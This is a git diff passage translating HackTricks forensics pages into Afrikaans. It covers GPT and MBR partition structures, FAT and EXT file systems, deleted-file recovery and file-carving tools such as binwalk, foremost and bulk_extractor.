vermoë om partisies te benoem met tot 36 Unicode-karakters. -- **Location and Size**: Both GPT and MBR start at **sector 0**. However, GPT operates on **64bits**, contrasting with MBR's 32bits. -- **Partition Limits**: GPT supports up to **128 partitions** on Windows systems and accommodates up to **9.4ZB** of data. -- **Partition Names**: Offers the ability to name partitions with up to 36 Unicode characters. +**Databestendigheid en -herwinning**: -**Data Resilience and Recovery**: +- **Redundansie**: Anders as MBR beperk GPT partisionering en opstartdata nie tot 'n enkele plek nie. Dit dupliseer hierdie data oor die skyf, wat data-integriteit en bestendigheid verbeter. +- **Sikliese Redundansie Kontrole (CRC)**: GPT gebruik CRC om data-integriteit te verseker. Dit monitor aktief vir datakorrupsie, en wanneer dit opgespoor word, probeer GPT om die gekorruppeerde data van 'n ander skyfplek te herstel. -- **Redundancy**: Unlike MBR, GPT doesn't confine partitioning and boot data to a single place. It replicates this data across the disk, enhancing data integrity and resilience. -- **Cyclic Redundancy Check (CRC)**: GPT employs CRC to ensure data integrity. It actively monitors for data corruption, and when detected, GPT attempts to recover the corrupted data from another disk location. +**Beskermende MBR (LBA0)**: -**Protective MBR (LBA0)**: - -- GPT maintains backward compatibility through a protective MBR. This feature resides in the legacy MBR space but is designed to prevent older MBR-based utilities from mistakenly overwriting GPT disks, hence safeguarding the data integrity on GPT-formatted disks. +- GPT handhaaf agterwaartse verenigbaarheid deur middel van 'n beskermende MBR. Hierdie funksie bly in die erfenis MBR-ruimte, maar is ontwerp om te voorkom dat ouer MBR-gebaseerde hulpprogramme GPT-skywe per ongeluk oorskryf, en sodoende die data-integriteit op GPT-geformateerde skywe beskerm. ![https://upload.wikimedia.org/wikipedia/commons/thumb/0/07/GUID_Partition_Table_Scheme.svg/800px-GUID_Partition_Table_Scheme.svg.png](<../../../.gitbook/assets/image (491).png>) -**Hybrid MBR (LBA 0 + GPT)** +**Hibriede MBR (LBA 0 + GPT)** -[From Wikipedia](https://en.wikipedia.org/wiki/GUID_Partition_Table) +[Vanaf Wikipedia](https://en.wikipedia.org/wiki/GUID_Partition_Table) -In operating systems that support **GPT-based boot through BIOS** services rather than EFI, the first sector may also still be used to store the first stage of the **bootloader** code, but **modified** to recognize **GPT** **partitions**. The bootloader in the MBR must not assume a sector size of 512 bytes. +In bedryfstelsels wat **GPT-gebaseerde opstart deur BIOS**-dienste ondersteun eerder as EFI, kan die eerste sektor ook steeds gebruik word om die eerste stadium van die **opstartlader**-kode te stoor, maar **aangepas** om **GPT-partisies** te herken. Die opstartlader in die MBR mag nie 'n sektor-grootte van 512 byte aanneem nie. -**Partition table header (LBA 1)** +**Partisietabelkop (LBA 1)** -[From Wikipedia](https://en.wikipedia.org/wiki/GUID_Partition_Table) +[Vanaf Wikipedia](https://en.wikipedia.org/wiki/GUID_Partition_Table) -The partition table header defines the usable blocks on the disk. It also defines the number and size of the partition entries that make up the partition table (offsets 80 and 84 in the table). +Die partisietabelkop definieer die bruikbare blokke op die skyf. Dit definieer ook die aantal en grootte van die partisieinskrywings wat die partisietabel uitmaak (offsets 80 en 84 in die tabel). -| Offset | Length | Contents | -| --------- | -------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | -| 0 (0x00) | 8 bytes | Signature ("EFI PART", 45h 46h 49h 20h 50h 41h 52h 54h or 0x5452415020494645ULL[ ](https://en.wikipedia.org/wiki/GUID\_Partition\_Table#cite\_note-8)on little-endian machines) | -| 8 (0x08) | 4 bytes | Revision 1.0 (00h 00h 01h 00h) for UEFI 2.8 | -| 12 (0x0C) | 4 bytes | Header size in little endian (in bytes, usually 5Ch 00h 00h 00h or 92 bytes) | -| 16 (0x10) | 4 bytes | [CRC32](https://en.wikipedia.org/wiki/CRC32) of header (offset +0 up to header size) in little endian, with this field zeroed during calculation | -| 20 (0x14) | 4 bytes | Reserved; must be zero | -| 24 (0x18) | 8 bytes | Current LBA (location of this header copy) | -| 32 (0x20) | 8 bytes | Backup LBA (location of the other header copy) | -| 40 (0x28) | 8 bytes | First usable LBA for partitions (primary partition table last LBA + 1) | -| 48 (0x30) | 8 bytes | Last usable LBA (secondary partition table first LBA − 1) | -| 56 (0x38) | 16 bytes | Disk GUID in mixed endian | -| 72 (0x48) | 8 bytes | Starting LBA of an array of partition entries (always 2 in primary copy) | -| 80 (0x50) | 4 bytes | Number of partition entries in array | -| 84 (0x54) | 4 bytes | Size of a single partition entry (usually 80h or 128) | -| 88 (0x58) | 4 bytes | CRC32 of partition entries array in little endian | -| 92 (0x5C) | \* | Reserved; must be zeroes for the rest of the block (420 bytes for a sector size of 512 bytes; but can be more with larger sector sizes) | +| Offset | Lengte | Inhoud | +| --------- | -------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | +| 0 (0x00) | 8 byte | Handtekening ("EFI PART", 45h 46h 49h 20h 50h 41h 52h 54h of 0x5452415020494645ULL[ ](https://en.wikipedia.org/wiki/GUID\_Partition\_Table#cite\_note-8)op klein-eindige masjiene) | +| 8 (0x08) | 4 byte | Hersiening 1.0 (00h 00h 01h 00h) vir UEFI 2.8 | +| 12 (0x0C) | 4 byte | Kopgrootte in klein-eindige (in byte, gewoonlik 5Ch 00h 00h 00h of 92 byte) | +| 16 (0x10) | 4 byte | [CRC32](https://en.wikipedia.org/wiki/CRC32) van die kop (offset +0 tot kopgrootte) in klein-eindige, met hierdie veld nul gemaak tydens berekening | +| 20 (0x14) | 4 byte | Voorbehou; moet nul wees | +| 24 (0x18) | 8 byte | Huidige LBA (ligging van hierdie kopie van die kop) | +| 32 (0x20) | 8 byte | Rugsteun LBA (ligging van die ander kopie van die kop) | +| 40 (0x28) | 8 byte | Eerste bruikbare LBA vir partisies (laaste LBA van primêre partisietabel + 1) | +| 48 (0x30) | 8 byte | Laaste bruikbare LBA (eerste LBA van sekondêre partisietabel - 1) | +| 56 (0x38) | 16 byte | Skyf-GUID in gemengde eindige | +| 72 (0x48) | 8 byte | Begin-LBA van 'n reeks partisieinskrywings (altyd 2 in primêre kopie) | +| 80 (0x50) | 4 byte | Aantal partisieinskrywings in reeks | +| 84 (0x54) | 4 byte | Grootte van 'n enkele partisieinskrywing (gewoonlik 80h of 128) | +| 88 (0x58) | 4 byte | CRC32 van die reeks partisieinskrywings in klein-eindige | +| 92 (0x5C) | \* | Voorbehou; moet nulle wees vir die res van die blok (420 byte vir 'n sektorgrootte van 512 byte; maar kan meer wees met groter sektorgroottes) | -**Partition entries (LBA 2–33)** +**Partisieinskrywings (LBA 2–33)** -| GUID partition entry format | | | -| --------------------------- | -------- | ----------------------------------------------------------------------------------------------------------------- | -| Offset | Length | Contents | -| 0 (0x00) | 16 bytes | [Partition type GUID](https://en.wikipedia.org/wiki/GUID\_Partition\_Table#Partition\_type\_GUIDs) (mixed endian) | -| 16 (0x10) | 16 bytes | Unique partition GUID (mixed endian) | -| 32 (0x20) | 8 bytes | First LBA ([little endian](https://en.wikipedia.org/wiki/Little\_endian)) | -| 40 (0x28) | 8 bytes | Last LBA (inclusive, usually odd) | -| 48 (0x30) | 8 bytes | Attribute flags (e.g. bit 60 denotes read-only) | -| 56 (0x38) | 72 bytes | Partition name (36 [UTF-16](https://en.wikipedia.org/wiki/UTF-16)LE code units) | +| GUID-partisieinskrywingsformaat | | | +| ------------------------------ | -------- | ------------------------------------------------------------------------------------------------------------------- | +| Offset | Lengte | Inhoud | +| 0 (0x00) | 16 byte | [Partisietipe-GUID](https://en.wikipedia.org/wiki/GUID\_Partition\_Table#Partition\_type\_GUIDs) (gemengde eindige) | +| 16 (0x10) | 16 byte | Unieke partisie-GUID (gemengde eindige) | +| 32 (0x20) | 8 byte | Eerste LBA ([klein-eindige](https://en.wikipedia.org/wiki/Little\_endian)) | +| 40 (0x28) | 8 byte | Laaste LBA (inklusief, gewoonlik oneweredig) | +| 48 (0x30) | 8 byte | Kenmerkvlaggies (bv. bit 60 dui op skryfbeskerming) | +| 56 (0x38) | 72 byte | Partisienaam (36 [UTF-16](https://en.wikipedia.org/wiki/UTF-16)LE-kode-eenhede) | -**Partitions Types** +**Partisietipes** ![](<../../../.gitbook/assets/image (492).png>) -More partition types in [https://en.wikipedia.org/wiki/GUID\_Partition\_Table](https://en.wikipedia.org/wiki/GUID\_Partition\_Table) +Meer partisietipes in [https://en.wikipedia.org/wiki/GUID\_Partition\_Table](https://en.wikipedia.org/wiki/GUID\_Partition\_Table) -### Inspecting +### Inspekteer -After mounting the forensics image with [**ArsenalImageMounter**](https://arsenalrecon.com/downloads/), you can inspect the first sector using the Windows tool [**Active Disk Editor**](https://www.disk-editor.org/index.html)**.** In the following image an **MBR** was detected on the **sector 0** and interpreted: +Nadat die forensiese beeld met [**ArsenalImageMounter**](https://arsenalrecon.com/downloads/) gemoniteer is, kan jy die eerste sektor inspekteer met die Windows-hulpmiddel [**Active Disk Editor**](https://www.disk-editor.org/index.html)**.** In die volgende afbeelding is 'n **MBR** op **sektor 0** opgespoor en geïnterpreteer: ![](<../../../.gitbook/assets/image (494).png>) -If it was a **GPT table instead of an MBR** it should appear the signature _EFI PART_ in the **sector 1** (which in the previous image is empty). +As dit 'n **GPT-tabel in plaas van 'n MBR** was, sou die handtekening _EFI PART_ in **sektor 1** verskyn (wat in die vorige afbeelding leeg is). +## Lêerstelsels -## File-Systems - -### Windows file-systems list +### Lys van Windows-lêerstelsels * **FAT12/16**: MSDOS, WIN95/98/NT/200 * **FAT32**: 95/2000/XP/2003/VISTA/7/8/10 @@ -165,81 +162,81 @@ If it was a **GPT table instead of an MBR** it should appear the signature _EFI ### FAT -The **FAT (File Allocation Table)** file system is designed around its core component, the file allocation table, positioned at the volume's start. This system safeguards data by maintaining **two copies** of the table, ensuring data integrity even if one is corrupted. The table, along with the root folder, must be in a **fixed location**, crucial for the system's startup process. +Die **FAT (File Allocation Table)** lêerstelsel is ontwerp rondom sy kernkomponent, die lêertoewysingstabel, wat by die begin van die volume geplaas is. Hierdie stelsel beskerm data deur **twee kopieë** van die tabel te behou, wat data-integriteit verseker selfs as een daarvan beskadig is. Die tabel, tesame met die hoofmap, moet in 'n **vasgestelde posisie** wees, wat noodsaaklik is vir die opstartproses van die stelsel. -The file system's basic unit of storage is a **cluster, usually 512B**, comprising multiple sectors. FAT has evolved through versions: +Die basiese eenheid van stoor van die lêerstelsel is 'n **kluster, gewoonlik 512B**, wat uit verskeie sektore bestaan. FAT het deur weergawes geëvolueer: -- **FAT12**, supporting 12-bit cluster addresses and handling up to 4078 clusters (4084 with UNIX). -- **FAT16**, enhancing to 16-bit addresses, thereby accommodating up to 65,517 clusters. -- **FAT32**, further advancing with 32-bit addresses, allowing an impressive 268,435,456 clusters per volume. +- **FAT12**, wat 12-bits klusteradres ondersteun en tot 4078 klusters hanteer (4084 met UNIX). +- **FAT16**, wat verbeter tot 16-bits adresse, en dus tot 65,517 klusters kan akkommodeer. +- **FAT32**, wat verder gevorder het met 32-bits adresse, wat 'n indrukwekkende 268,435,456 klusters per volume moontlik maak. -A significant limitation across FAT versions is the **4GB maximum file size**, imposed by the 32-bit field used for file size storage. +'n Belangrike beperking oor alle FAT-weergawes is die **maksimum lêergrootte van 4GB**, wat opgelê word deur die 32-bits veld wat vir lêergrootte stoor gebruik word. -Key components of the root directory, particularly for FAT12 and FAT16, include: +Sleutelkomponente van die hoofgids, veral vir FAT12 en FAT16, sluit in: -- **File/Folder Name** (up to 8 characters) -- **Attributes** -- **Creation, Modification, and Last Access Dates** -- **FAT Table Address** (indicating the start cluster of the file) -- **File Size** +- **Lêer/Map Naam** (tot 8 karakters) +- **Eienskappe** +- **Skep-, Wysigings- en Laaste Toegangsdatums** +- **FAT Tabeladres** (wat die beginkluster van die lêer aandui) +- **Lêergrootte** ### EXT -**Ext2** is the most common file system for **not journaling** partitions (**partitions that don't change much**) like the boot partition. **Ext3/4** are **journaling** and are used usually for the **rest partitions**. +**Ext2** is die mees algemene lêerstelsel vir **nie-joernalering** partisies (**partisies wat nie veel verander nie**) soos die opstartpartisie. **Ext3/4** is **joernalering** en word gewoonlik gebruik vir die **res van die partisies**. ## **Metadata** -Some files contain metadata. This information is about the content of the file which sometimes might be interesting to an analyst as depending on the file type, it might have information like: +Sommige lêers bevat metadata. Hierdie inligting gaan oor die inhoud van die lêer wat soms interessant kan wees vir 'n analis as gevolg van die lêertipe, wat inligting soos die volgende kan bevat: -* Title -* MS Office Version used -* Author -* Dates of creation and last modification -* Model of the camera -* GPS coordinates -* Image information +* Titel +* MS Office-weergawe wat gebruik is +* Outeur +* Skep- en laaste wysigingsdatums +* Kamera model +* GPS-koördinate +* Beeldinligting -You can use tools like [**exiftool**](https://exiftool.org) and [**Metadiver**](https://www.easymetadata.com/metadiver-2/) to get the metadata of a file. +Jy kan hulpmiddels soos [**exiftool**](https://exiftool.org) en [**Metadiver**](https://www.easymetadata.com/metadiver-2/) gebruik om die metadata van 'n lêer te verkry. -## **Deleted Files Recovery** +## **Herwinning van Verwyderde Lêers** -### Logged Deleted Files +### Gelogde Verwyderde Lêers -As was seen before there are several places where the file is still saved after it was "deleted". This is because usually the deletion of a file from a file system just marks it as deleted but the data isn't touched. Then, it's possible to inspect the registries of the files (like the MFT) and find the deleted files. +Soos voorheen gesien is daar verskeie plekke waar die lêer steeds gestoor word nadat dit "verwyder" is. Dit is omdat die verwydering van 'n lêer uit 'n lêerstelsel dit gewoonlik merk as verwyder, maar die data word nie geraak nie. Daarom is dit moontlik om die rekords van die lêers (soos die MFT) te ondersoek en die verwyderde lêers te vind. -Also, the OS usually saves a lot of information about file system changes and backups, so it's possible to try to use them to recover the file or as much information as possible. +Die bedryfstelsel stoor ook gewoonlik baie inligting oor lêerstelselveranderinge en rugsteun, so dit is moontlik om te probeer om dit te gebruik om die lêer of soveel moontlike inligting te herwin. {% content-ref url="file-data-carving-recovery-tools.md" %} [file-data-carving-recovery-tools.md](file-data-carving-recovery-tools.md) {% endcontent-ref %} -### **File Carving** +### **Lêer Carving** -**File carving** is a technique that tries to **find files in the bulk of data**. There are 3 main ways tools like this work: **Based on file types headers and footers**, based on file types **structures** and based on the **content** itself. +**Lêer carving** is 'n tegniek wat probeer om lêers in die massa data te vind. Daar is 3 hoofmaniere waarop sulke gereedskap werk: **Gebaseer op lêertipes se koppe en voette**, gebaseer op lêertipes se **strukture** en gebaseer op die **inhoud** self. -Note that this technique **doesn't work to retrieve fragmented files**. If a file **isn't stored in contiguous sectors**, then this technique won't be able to find it or at least part of it. +Let daarop dat hierdie tegniek **nie werk om gefragmenteerde lêers te herwin nie**. As 'n lêer **nie in aaneenlopende sektore gestoor word nie**, sal hierdie tegniek dit nie kan vind nie, of ten minste 'n deel daarvan. -There are several tools that you can use for file Carving indicating the file types you want to search for +Daar is verskeie gereedskap wat jy kan gebruik vir lêer Carving deur die lêertipes aan te dui wat jy wil soek {% content-ref url="file-data-carving-recovery-tools.md" %} [file-data-carving-recovery-tools.md](file-data-carving-recovery-tools.md) {% endcontent-ref %} -### Data Stream **C**arving +### Datastroom **C**arving -Data Stream Carving is similar to File Carving but **instead of looking for complete files, it looks for interesting fragments** of information.\ -For example, instead of looking for a complete file containing logged URLs, this technique will search for URLs. +Datastroom Carving is soortgelyk aan Lêer Carving, maar **in plaas daarvan om volledige lêers te soek, soek dit na interessante fragmente** van inligting.\ +Byvoorbeeld, in plaas daarvan om 'n volledige lêer te soek wat gelogde URL's bevat, sal hierdie tegniek soek na URL's. {% content-ref url="file-data-carving-recovery-tools.md" %} [file-data-carving-recovery-tools.md](file-data-carving-recovery-tools.md) {% endcontent-ref %} -### Secure Deletion +### Veilige Verwydering -Obviously, there are ways to **"securely" delete files and part of logs about them**. For example, it's possible to **overwrite the content** of a file with junk data several times, and then **remove** the **logs** from the **$MFT** and **$LOGFILE** about the file, and **remove the Volume Shadow Copies**.\ -You may notice that even performing that action there might be **other parts where the existence of the file is still logged**, and that's true and part of the forensics professional job is to find them. +Daar is natuurlik maniere om lêers en dele van logboeke oor hulle **"veilig" te verwyder**. Dit is byvoorbeeld moontlik om die inhoud van 'n lêer herhaaldelik met rommeldata te **oorlê**, en dan die **logboeke** van die **$MFT** en **$LOGFILE** oor die lêer te **verwyder**, en die **Volume Shadow Copies** te **verwyder**.\ +Jy mag opmerk dat selfs nadat daardie aksie uitgevoer is, daar **ander dele is waar die bestaan van die lêer steeds gelog word**, en dit is waar en deel van die forensiese professionele se werk is om dit te vind. -## References +## Verwysings * [https://en.wikipedia.org/wiki/GUID\_Partition\_Table](https://en.wikipedia.org/wiki/GUID\_Partition\_Table) * [http://ntfs.com/ntfs-permissions.htm](http://ntfs.com/ntfs-permissions.htm) @@ -249,14 +246,14 @@ You may notice that even performing that action there might be **other parts whe
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
diff --git a/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md b/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md index 01871c96c..eb77551c5 100644 --- a/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md +++ b/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md @@ -1,136 +1,124 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. +Vind kwesbaarhede wat die belangrikste is sodat jy hulle vinniger kan regstel. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag nog gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks). {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} *** -# Carving & Recovery tools +# Carving & Herstelgereedskap -More tools in [https://github.com/Claudio-C/awesome-datarecovery](https://github.com/Claudio-C/awesome-datarecovery) +Meer gereedskap in [https://github.com/Claudio-C/awesome-datarecovery](https://github.com/Claudio-C/awesome-datarecovery) ## Autopsy -The most common tool used in forensics to extract files from images is [**Autopsy**](https://www.autopsy.com/download/). Download it, install it and make it ingest the file to find "hidden" files. Note that Autopsy is built to support disk images and other kinds of images, but not simple files. +Die mees algemene gereedskap wat in forensika gebruik word om lêers uit beelde te onttrek, is [**Autopsy**](https://www.autopsy.com/download/). Laai dit af, installeer dit en laat dit die lêer insluk om "verborge" lêers te vind. Let daarop dat Autopsy gebou is om skyfbeelders en ander soorte beelde te ondersteun, maar nie eenvoudige lêers nie. ## Binwalk -**Binwalk** is a tool for analyzing binary files to find embedded content. It's installable via `apt` and its source is on [GitHub](https://github.com/ReFirmLabs/binwalk). - -**Useful commands**: +**Binwalk** is 'n gereedskap vir die analise van binêre lêers om ingebedde inhoud te vind. Dit kan geïnstalleer word via `apt` en die bronkode is op [GitHub](https://github.com/ReFirmLabs/binwalk). +**Nuttige opdragte**: ```bash sudo apt install binwalk #Insllation binwalk file #Displays the embedded data in the given file binwalk -e file #Displays and extracts some files from the given file binwalk --dd ".*" file #Displays and extracts all files from the given file ``` - ## Foremost -Another common tool to find hidden files is **foremost**. You can find the configuration file of foremost in `/etc/foremost.conf`. If you just want to search for some specific files uncomment them. If you don't uncomment anything foremost will search for its default configured file types. - +'n Ander algemene instrument om verskuilde lêers te vind is **foremost**. Jy kan die opsetlêer van foremost in `/etc/foremost.conf` vind. As jy net wil soek na sekere spesifieke lêers, verwyder die kommentaarmerke. As jy niks verwyder nie, sal foremost soek na sy verstek geconfigureerde lêertipes. ```bash sudo apt-get install foremost foremost -v -i file.img -o output #Discovered files will appear inside the folder "output" ``` - ## **Scalpel** -**Scalpel** is another tool that can be used to find and extract **files embedded in a file**. In this case, you will need to uncomment from the configuration file (_/etc/scalpel/scalpel.conf_) the file types you want it to extract. - +**Scalpel** is nog 'n instrument wat gebruik kan word om **lêers wat in 'n lêer ingebed is** te vind en te onttrek. In hierdie geval moet jy die lêertipes wat jy wil onttrek, ontkommentarieer uit die konfigurasie-lêer (_/etc/scalpel/scalpel.conf_). ```bash sudo apt-get install scalpel scalpel file.img -o output ``` - ## Bulk Extractor -This tool comes inside kali but you can find it here: [https://github.com/simsong/bulk\_extractor](https://github.com/simsong/bulk\_extractor) - -This tool can scan an image and will **extract pcaps** inside it, **network information (URLs, domains, IPs, MACs, mails)** and more **files**. You only have to do: +Hierdie instrument kom binne kali, maar jy kan dit hier vind: [https://github.com/simsong/bulk\_extractor](https://github.com/simsong/bulk\_extractor) +Hierdie instrument kan 'n beeld skandeer en sal **pcaps onttrek** binne dit, **netwerkinligting (URL's, domeine, IP's, MAC's, e-posse)** en meer **lêers**. Jy hoef net te doen: ``` bulk_extractor memory.img -o out_folder ``` - -Navigate through **all the information** that the tool has gathered (passwords?), **analyse** the **packets** (read[ **Pcaps analysis**](../pcap-inspection/)), search for **weird domains** (domains related to **malware** or **non-existent**). +Navigeer deur **alle inligting** wat die instrument ingesamel het (wagwoorde?), **analiseer** die **pakkies** (lees [**Pcaps-analise**](../pcap-inspection/)), soek na **vreemde domeine** (domeine wat verband hou met **kwaadwillige sagteware** of **nie-bestaande** domeine). ## PhotoRec -You can find it in [https://www.cgsecurity.org/wiki/TestDisk\_Download](https://www.cgsecurity.org/wiki/TestDisk\_Download) +Jy kan dit vind by [https://www.cgsecurity.org/wiki/TestDisk\_Download](https://www.cgsecurity.org/wiki/TestDisk\_Download) -It comes with GUI and CLI versions. You can select the **file-types** you want PhotoRec to search for. +Dit kom met GUI- en CLI-weergawes. Jy kan die **lêertipes** kies wat PhotoRec moet soek. ![](<../../../.gitbook/assets/image (524).png>) ## binvis -Check the [code](https://code.google.com/archive/p/binvis/) and the [web page tool](https://binvis.io/#/). +Kyk na die [kode](https://code.google.com/archive/p/binvis/) en die [webwerf-instrument](https://binvis.io/#/). -### Features of BinVis +### Kenmerke van BinVis -* Visual and active **structure viewer** -* Multiple plots for different focus points -* Focusing on portions of a sample -* **Seeing stings and resources**, in PE or ELF executables e. g. -* Getting **patterns** for cryptanalysis on files -* **Spotting** packer or encoder algorithms -* **Identify** Steganography by patterns -* **Visual** binary-diffing +* Visuele en aktiewe **struktuurkyker** +* Verskeie grafieke vir verskillende fokuspunte +* Fokus op dele van 'n monster +* **Sien reekse en hulpbronne**, in PE- of ELF-uitvoerbare lêers, byvoorbeeld +* Kry **patrone** vir kripto-analise van lêers +* **Opmerk** verpakker- of enkodeeralgoritmes +* **Identifiseer** steganografie deur patrone +* **Visuele** binêre verskil -BinVis is a great **start-point to get familiar with an unknown target** in a black-boxing scenario. +BinVis is 'n goeie **beginpunt om bekend te raak met 'n onbekende teiken** in 'n swart-boks scenario. -# Specific Data Carving Tools +# Spesifieke Data Carving-instrumente ## FindAES -Searches for AES keys by searching for their key schedules. Able to find 128. 192, and 256 bit keys, such as those used by TrueCrypt and BitLocker. +Soek na AES-sleutels deur te soek na hul sleutelskedules. In staat om 128, 192 en 256 bit sleutels te vind, soos dié wat deur TrueCrypt en BitLocker gebruik word. -Download [here](https://sourceforge.net/projects/findaes/). +Laai dit hier af: [here](https://sourceforge.net/projects/findaes/). -# Complementary tools +# Aanvullende instrumente -You can use [**viu** ](https://github.com/atanunq/viu)to see images from the terminal.\ -You can use the linux command line tool **pdftotext** to transform a pdf into text and read it. +Jy kan [**viu** ](https://github.com/atanunq/viu)gebruik om beelde vanuit die terminaal te sien.\ +Jy kan die Linux-opdraglyn-instrument **pdftotext** gebruik om 'n pdf in te skakel na teks en dit te lees.
-Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. +Vind kwesbaarhede wat die belangrikste is sodat jy dit vinniger kan regstel. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag nog gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks). {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
